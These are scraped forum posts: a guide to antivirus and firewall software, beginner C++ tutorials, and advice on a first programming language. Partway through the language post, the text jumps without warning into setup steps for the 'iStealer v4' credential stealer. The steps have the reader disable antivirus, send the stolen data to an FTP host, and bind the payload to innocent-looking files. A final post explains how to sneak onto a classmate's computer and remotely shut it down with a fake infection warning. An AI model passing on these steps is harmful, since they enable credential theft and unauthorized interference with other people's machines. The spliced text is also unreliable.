  18. Table of Contents: 1.Basics to being secure on the web 2. Antivirus 3. Antispyware 4. Firewall 5. Prevention 6. List of Security Software 7. External Links & Information 1. Basics to being secure on the web First of all, no security in the world can keep you completely safe from every single unique malware created. The number one way to stay safe is having safe surfing habits. Remember, preventing a virus from ever winding its way onto your PC in the first place is the best way to keep safe. Safe surfing habits means you don't just Google something and click on the first result that comes up. It would be good to get in a habit of checking websites you browse to. You can easily do that with a quick Google search of " [website URL] good or bad?". The way I do it is checking on McAfee's Siteadvisor website: Siteadvisor. Do a quick search on there, read some of the reviews, and make your decision on if you should go onto that website or not. 2. Antivirus **Note: Do NOT install and run more than one antivirus per PC. Having more than one antivirus does not secure your PC any more than having one does. All it causes are conflicts on your PC. There are plenty of good antiviruses out there. Though this is biased in my opinion, I have researched a bit on several vendors and come to a few conclusions. I have seperated the comparison into two categories: freeware and paid software. Do note, paid software isn't necessarily better than freeware. Starting off with commercial products, I believe the top two competitors would be Kaspersky Internet Security and ESET Smart Security. I personally have only used Kaspersky, ESET, McAfee, and Symantec commercial products. Kaspersky has been noted for its high detection capabilities, and it is not a memory hogger. It comes with several features, including an antivirus and antispyware engine, a firewall, spam filter, parental controls, and a few other tools. February 2009 AV Comparatives Results Award received: Advanced + Number of False Positives: Few On demand Scanning Speed: Average Total Percentage (Detection Rate): 97.1% ESET is also known for high detection rates. In addition, it is recorded as the most lightweight antivirus in its market. ESET has a sleek interface and includes features such as an antivirus and antispyware engine, a firewall, a spam filter, and a few other tools. February 2009 AV Comparatives Results Award received: Advanced + Number of False Positives: Few On demand Scanning Speed: Average Total Percentage (Detection Rate): 97.6% Next are the freeware programs. I personally have only tried AVG, avast! and Avira Antivir. I recommend either Avira Antivir or avast! Antivirus. Avira Antivir is rated number one in detection rates for 2008/2009. Based on tests by AVcomparative, Avira detected over 99% of the threats that were set on the system. The only thing I can criticize is Avira's updating system is a bit on the slow side. Features of Avira (free version) include an antivirus and antispyware engine, with a couple of other features. February 2009 AV Comparatives Results Award received: Advanced Number of False Positives: Many On demand Scanning Speed: Average Total Percentage (Detection Rate): 99.7% *Note: The reason Avira Antivir did not receive Advanced + is because of the high number of false positives. Download link for the Avira Antivir Personal Edition: http://download.cnet.com/3001-2239_4-10322935.html?spi=e6e462f80757049a31116cdaf2c22284&part=dl-10322935 avast! Antivirus is a free antivirus that comes with an antivirus, antispyware, and anti-rootkit engine, along with online protection. It too has a high detection rate. February 2009 AV Comparatives Results Award received: Advanced Number of False Positives: Many On demand Scanning Speed: Fast Total Percentage (Detection Rate): 98.2% Download link: http://www.avast.com/eng/avast_4_home.html 3. Antispyware If you are using a commercial antivirus product, chances are you already have an antispyware engine bundled with it so skip this section. However, if you are using a free antivirus, here is a list of a few antispyware programs you may be interested in. Malwarebytes' Antimalware A new antispyware program, this small program is recommended for several reasons. One, it has great detection rates. Two, it uses minimal system resources. Three, fast updates, quick scans; it also produces a log after each scan. Malwarebytes' Antimalware comes with an extra tool, FileAssassin. This is used to securely delete locked files, or persistent malware files. Download link: http://malwarebytes.org/ Ad-Aware Though Ad-Aware isn't as recommended by security experts anymore, it is still good to have as a backup scanner. Download link: Ad-Aware Free AVG Antispyware was removed from this list due to the recent decision to not have AVG Antispyware as a stand alone product. It is now included in the AVG Internet Security Suite 4. Firewall **Note: Just like an antivirus, do not run more than one firewall per PC. It causes conflicts on your PC. Again, if you are using a commercial security suite, a firewall should already be included. Firewalls are vital to a computer's security. They help monitor incoming and outcoming connections, etc. There are many free firewalls out there, and the few that I recommend are ZoneAlarm and Comodo Firewall. ZoneAlarm is for a less computer savvy user. It has the basic features of a firewall, with antivirus monitoring included. Download link:http://img25.imageshack.us/img25/9232/96460237.jpg[/img] Comodo Firewall comes with an antivirus engine. It is a bit more advanced than ZoneAlarm. It also has basic firewall features, along with the bonus feature of an antivirus. I wouldn't rely solely on Comodo's antivirus though; you should still have an independent antivirus. Download link:http://personalfirewall.comodo.com/download_firewall.html]http://www.zonealarm.com/security/en-us/zonealarm-pc-security-free-firewall.htm[/url\ Comodo Firewall comes with an antivirus engine. It is a bit more advanced than ZoneAlarm. It also has basic firewall features, along with the bonus feature of an antivirus. I wouldn't rely solely on Comodo's antivirus though; you should still have an independent antivirus. Download link:http://personalfirewall.comodo.com/download_firewall.html Online Armor is a well recognized firewall. It is also considered a HIPS program, and is very useful in detecting malware. Download link:http://www.tallemu.com/ 5. Prevention This may be one of the most important parts in this whole guide. Prevention is the key. A couple of things I recommend to finalize your computer's security: MVPS Hosts file A HOSTS file is basically a file that blocks websites. For this reason, it is very useful. MVPS Hosts can be used to block malicious websites. This means when you go on one of the malicious websites, your browser should show a "Page load error" instead of loading the page. Instructions and download link is here: MVPS Hosts SpywareBlaster SpywareBlaster is a program that creates a list of restricted sites, and it blocks cookies in Mozilla FireFox and Internet Explorer. Download link and more information here: SpywareBlaster WinPatrol WinPatrol is a handy tool that monitors any unwanted changes to your system, including changes in startup programs, HOSTS file, etc. Download link and information: WinPatrol These last couple of programs can be useful too, but I won't go into details about them: SandBoxie - a sandbox for running programs in CCleaner - clearing out temp files, etc 6. List of Securiy Software This may be incomplete, so please reply or give me a PM if there is something to be added. This is meant as a reference list if ever needed. Antivirus Security Vendors: McAfee (McAfee products) Kaspersky (Kaspersky products) Alwil (avast! products) Symantec (Norton products) Sophos (Sophos products) ESET (NOD32 and ESET Smart Security products) AVG (AVG products ; AVG Antispyware was bought by AVG, originally named Ewido) BitDefender (BitDefender products) Panda (Panda products + new Cloud Antivirus) F-Secure (F-Secure products + Conflicker worm removal tool) Kingsoft (Kingsoft products) Microsoft (Microsoft Live OneCare ; to be discontinued soon) Norman PC Tools Rising ZoneAlarm (ZoneAlarm products; specialty is in firewalls) Antispyware Vendors: Webroot (SpySweeper) Lavasoft (Ad-Aware) Sunbelt (Counterspy) Prevx (Prevx CSI) Microsoft (Windows Defender) Firewall: ZoneAlarm Comodo Sunbelt (Kerio Firewall) Agnitum (Outpost Firewall) Tiny (Tiny Firewall) Online Armor HIPS (Host Intrusion Prevention System): PC Tools (ThreatFire) Crawler (Spyware Terminator) DefenseWall Anti-Trojan: Trojan Hunter a-squared Anti-Keylogger" KeyScrammbler Rootkit Removers: IceSword F-Secure BlackLight GMER AVG Anti-Rootkit 7. 19. First please download Dev C++ because it is great for beginners. Once you have Dev C++ installed open it, once you have opened it goto File>New>Project>Console Application and pick a directory and name it Practice.dev. Now you must be like, huh, what does this mean? Well don't panic because you'll understand by the time this is over. Well lets break the code down. Also with C++ you always have to end a statement with a statement terminator ";". #include <cstdlib> You use this header for general operations and also because it defines multiple things, these include dynamic memory management, random number generation, communication with the environment, integer arthmetics, searching, sorting and converting. #include <iostream> This is another header, execpt this one you use for when you want to use "cout" and "cin". Woot, we've finished the headers. Did I loose you? Well don't stop now were not even half way. using namespace std; When you use this code in C++ its for everything, a function, a class or object from the C++ standard library. Examples: cout, cin, ect... int main(int argc, char *argv[]) First we declare "main" after wards we declare "argv" in main, as a char *, a pointer to an array of pointers to arrays of chars. Yeah! Now you about halfway done, only four more lines of code before we finish. { system("PAUSE"); return EXIT_SUCCESS; } Firstly, this in the code in "main" which we declared earlier, you can tell because we declared it and then we have the opening and closing brackets with code inside them. The "system("PAUSE")" means that we launch "PAUSE" as a system command, as you may or may not know Batch has a similar function where "PAUSE" is used. Pause basically just pauses your application and waits for the user to respond, it does this by saying "Hit any key to continue ect.." and it waits for the user to hit a key. So after they hit a key, the program exits and that's where "return EXIT_SUCCESS;" comes into play. After wards if you are using Dev C++ (Like you should be if you are a beginner) hit F9 to compile+run the Console Application that I just explained. Now after you understand the Console Application coding, I will teach you how to make your computer speak. Firstly we will be using "cout" which I have mentioned earlier. Cout is an object of class "ostream" which represents the standard output stream, not only that but it corresponds to the cstdio stream stdout. cout << "Hello, this is your computer talking." << endl; Go ahead and paste that code into your project Pretty sweet huh? You just made your computer talk. Now let me explain what it means. After "cout" we have "<<" which just tells the computer that we are about to make it say something and then we have what we want to say in quotation marks "" and after wards we have another set of "<<" to tell the computer that we are finished with what we had to say and then we have "endl" which ends the line and finally a statement terminator ";" to stop the statement.
  20. First of all you will require a C++ compiler; a compiler takes your code and converts to machine code so it can be executed by the operating system. To write the code you will require a text editor, luckily you can download/purchase an IDE (integrated development environment) which has a text editor and a compiler built into one. I recommend either Dev C++ (free) or Microsoft Visual C++ Express Edition (free) to begin with. Once you are feeling more confident with programming i would recommend Microsoft Visual Studio as it is an IDE for multiple languages (e.g. C++, VB, C#, J# and web development) and it includes some includes and libraries not included with the express edition. So what are you going to learn in this tutorial? Well we will be introducing the basics of a C++ program. It won’t do anything special except write a string of text to the console window. However, we will introduce how to retrieve and use user input. So let’s begin with our first program that will output the following string to the console window “Hello World!”, and then wait for the user to press a key Open up the IDE of your choice and create a new file with the .cpp extension, call it what you want for the purpose of this tutorial I will call it HelloWorld.cpp. You should now have a blank document open, so let’s start coding. The cout is the standard output stream used by C++, the two less than signs is the insertion operator. Next you enter your string between two quotation marks “Example”, then call the insertion operator again (<<). Finally after the insertion operator you write endl which is short for end line which you may have guessed ends the line so no more text is written to that line, you write << endl so you don’t have to clutter up your string with \n which does the same thing. The next line is placed directly below your cout statement: So when you write a application in C++ and you want to add comments for later reference it can be easily done with two forwards slashes. // This is a comment anything entered here will not be read by the C++ compiler . /* This is a multiline comment and will also not be read by the C++ compiler. */ So let’s actually write some C++ code, our first line in our HelloWorld application is: #include <iostream> This simply tells the C++ compiler to copy the contents of the file iostream into our application so we can use its functions. Include statements must go at the start of your program so that they can be used later in the program. Iostream is the basic input/output operations for C++ it allows you to write strings to the console window and also receive input from the user of the application. Our next line of code goes directly below the #include statement: using namespace std; This simply tells the C++ compiler to copy the contents of the file iostream into our application so we can use its functions. Include statements must go at the start of your program so that they can be used later in the program. Iostream is the basic input/output operations for C++ it allows you to write strings to the console window and also receive input from the user of the application. Our next line of code goes directly below the #include statement: using namespace std; This line of code tells the compiler that our application will be using the standard library. Using this line of code allows us to simply write cout instead of std::cout, most people do not use this line of code which is a bad habit as it namespace pollution. Make sure you end the line of code with a semicolon (;) as it separates out your statements. The next line goes below the last line: int main() { The int is short for Integral Type and is 32 bits in size. The C++ language specifies that the main has to return int. The main() tells the compiler that our program should start executing here. The curly brace after the two parenthesis tells the compiler that the main() starts here. The next line will actually be the line which outputs the string to the console window: cout << “Hello World!” << endl The cout is the standard output stream used by C++, the two less than signs is the insertion operator. The next line is placed directly below your cout statement: cin.ignore(); This after the string is outputted to the screen waits for the user to press a key then shuts down the application. In other tutorials you may have seen system(“PAUSE”); which does the same as cin.ignore(); but says: Press any key to continue..., system calls are not a good thing to use. Also the cin.ignore(); doesn’t present you with a message which makes a nicer cleaner program. The final line of code we use in this main() section is: return 0; This line ends the main() function, returning a value of 0 means that there was no expected errors. After the return 0; line add the finally piece of code: } This tells the compiler that the main() section of code is finished. Here is the complete source code: #include <iostream> using namespace std; int main(){ cout << "Hello World!" << endl; cin.ignore(); return 0; } So if you copy/rewrite that into your C++ IDE then press compile and run or debug it will compile your code and turn it into an executable. So now that we have created our first program that uses the output section of iostream include, let’s get some user input and display a message using the user input. So using our code from above place the following line after int main(){ and before cout << ... : int age; As mentioned before the int is a data type and stores a 32 bit value. Next there is the word age which is a variable name we are going to be using for when we retrieve and use user input (make sure you end the statement with a semicolon). So now let’s use our age variable to retrieve an age from the user, first change the cout << string to a question the user can answer for the purpose of this tutorial the string will be “How old are you?”: cout << "How Old Are You?" << endl; This is the changed cout << statement. So let’s get the users input after your cout << statement add this line of code: cin >> age; This line of code makes use of the iostream include and because we are using the standard library namespace we can just write cin. The cin parts asks the user to define what they should define age as e.g. (33). Like the cout statement you need the insertion operator, however for getting user input you use greater than signs rather than less than. After the insertion operator you say what variable you want the user to define and then end with a semicolon. Add the following line under your cin line: cout << "You Are " << age << " Years old!" << endl; This uses the cout function and the insertion operator as used by our previous cout statement and also a string. However, unlike before you have the variable name surrounded by insertion operators then another string. The insertion operators basically take the value of age and place in the output, note: the insertion wrapped variable must be followed by two “” or a string e.g. in this case we used a string. The cout ends with the << endl; like before. The cin.ignore(); will not work here as it will end the program prematurely and having nothing will do the same so instead replace cin.ignore(); with system(“PAUSE”); If you know compile and run or debug this program it will ask for the users age, then allow the user to input an age then say how old they are. Full source code listing: #include <iostream> using namespace std; int main(){ int age; cout << "How Old Are You?" << endl; cin >> age; cout << "You Are " << age << " Years old!" << endl; system("PAUSE"); return 0; } hoped this help people in understanding the basics of a C++ program
  21. What language to learn first? Ive seen millions of threads asking which programming language should they learn first. The best programming language to learn first is python. Why? because its so easy and simple compared to many other languages. The first language you learn is the most important language you will learn. Simply because it is were you get your basic fundamentals of programming from. Dont just learn the basics of python and leave and go to a new language. Learn as much as you can until your able to program frequently and if learned correctly you can move on to any other programming language you want with no problem, since every programming language are the same epset they have different syntax. You can start with c/c++ like everyone else says because they are real powerful languages but you would struggle more with them then with python, and then like many people have done quit on programming because they say its too hard or boring. Learning the basics and moving up Before you even start thinking of a programming language you want to learn, start off with the basic terms every programming language consist of. These definitions should be memorized because it will help in learning any language. a "Variable" is a word or abbreviation that contains a value a "statement" is a line of code that performs a command a "constant" is like a variable except the value cannot change an "array" is like a variable only holding many values instead of one(like a database) a "declaration" is the act of declaring something an "expression" is a statement that performs a calculation or results in a value an "operator" is what is used to perform an expression "truncation" is the result of rounding off the fractional part of a number "demotion" occurs when reducing the size of a value "promotion" is the exact opposite as demotion a "comment" is a way to make notes in your code, and to instruct the parsing engine to ignore these lines "branch" is know as an if or if/else statement the "break" statement tells the code to exit the loop a "loop" is a way to repeat code which are known to be while, do...while, for, and foreach a "function" is a block of code that can be called at any point in the script "scope" more or less refers to what can be accessed and where learning these before you learn a programming language will really help making your life easier learning a programming since after all a programming language only does what it is instructed to do, nothing more, and nothing less. In tutorials when given an example of a code manage to know what every specific line of code in the script is doing. If you do plan to learn python then a very good tutorial for begginers is dive into python. google it and get started with it right away. I will be posting more programming tutorials so i didint make this one long. Any questions post them here. Anything you want to add pm me it. Also, This program might be detected by ur AVG Any other Anti-Virus softwere so i suggest you turn it off. Step 3) When its done, Open it and it will say Password Put sigma Extract the files to the location you want When thats done Open "Loader" Or it wont work Step 4) Okay once iStealer v4 is up there should be a menu with different options. Where it says host Put "ftp.drivehq.com" without quotes. Where is says Login put your drivehq.com username. Where is says password enter your drivehq.com password. Where is says Dictionary You can leave it at / Or change it to your own location Ok, Now your done you can choose to bind ur server with another application, song, document, picture etc! If your asking Why did i use Adf.ly Its because Its just Link shortening , So when u click it click skip ad On top right.
  23. Things you should know before you begin: -You NEED a computer -You NEED a friend’s computer -You NEED a pencil/pen and paper or a really good memory -This only works if both computers are on the SAME network (i.e. computer labs at school) HOW TO REMOTELY SHUTDOWN COMPUTERS Before I start I want to make sure that anyone reading this guide understands that you MUST be on the same network as the computer you are trying to shutdown. This means that you can’t do it to a friend who lives next door, and most of the time it wont even work on to a computer in your house. However you may be able do this to computers on an office floor, or in a computer room/lab at school or the library. Step 1: First off, you will need to find the computer name of your targeted computer (this is the person you will be turning off). To do this, you need to get to their computer somehow (sorry I don’t have a guide on sucking up or invisibility). I suggest you wait until they go to the restroom or look away for a second (you'll only need to be on their computer for about 15 seconds or less). After you get on their computer you need to click ‘start,’ then right click on ‘my computer.’ Here you will see a little list, of which at the bottom will be ‘properties.’ Click ‘properties.’ After clicking ‘properties,’ look on the ‘computer name’ tab for the ‘full computer name.’ WRITE IT DOWN (another smart idea to shorten the time you're on their computer is to take a picture of it using your cell phone). Generally it will be something with some numbers and the word ‘YOUR’ in it. That’s always the default computer name and remains unchanged for most computers. Now you're all done on their computer. Make sure you put the screen back to how they left it so they don't think something is up. Step 2: Now go back to your computer. Click ‘start,’ then click ‘run’ (bottom left, under 'search').Now go back to your computer. Click ‘start,’ then click ‘run,' (bottom left, under 'search'). After the ‘run’ screen opens it should look like this: Now type ‘CMD’ into the box provided and click 'OK.' Now this window should pop up: When it opens type ‘shutdown/i' and this window will open: All you have to do now is click ‘add’ and type the name of the computer that you wrote down (or took a picture of) earlier (I suggest that you practice on yourself the first time then cancel the shutdown, see extra tips). You can also change the shutdown delay and even write a little message to the person you are shutting down in the 'comment' box. Try using a fun one like 'Your computer has been infected with an unknown device and needs to delete all open files.' That should really freak someone out who has a report or something important on the screen. Extra tips: If you wish to abort the shutdown during the timed delay, type ‘shutdown/a’ into the command prompt and it should abort the process.
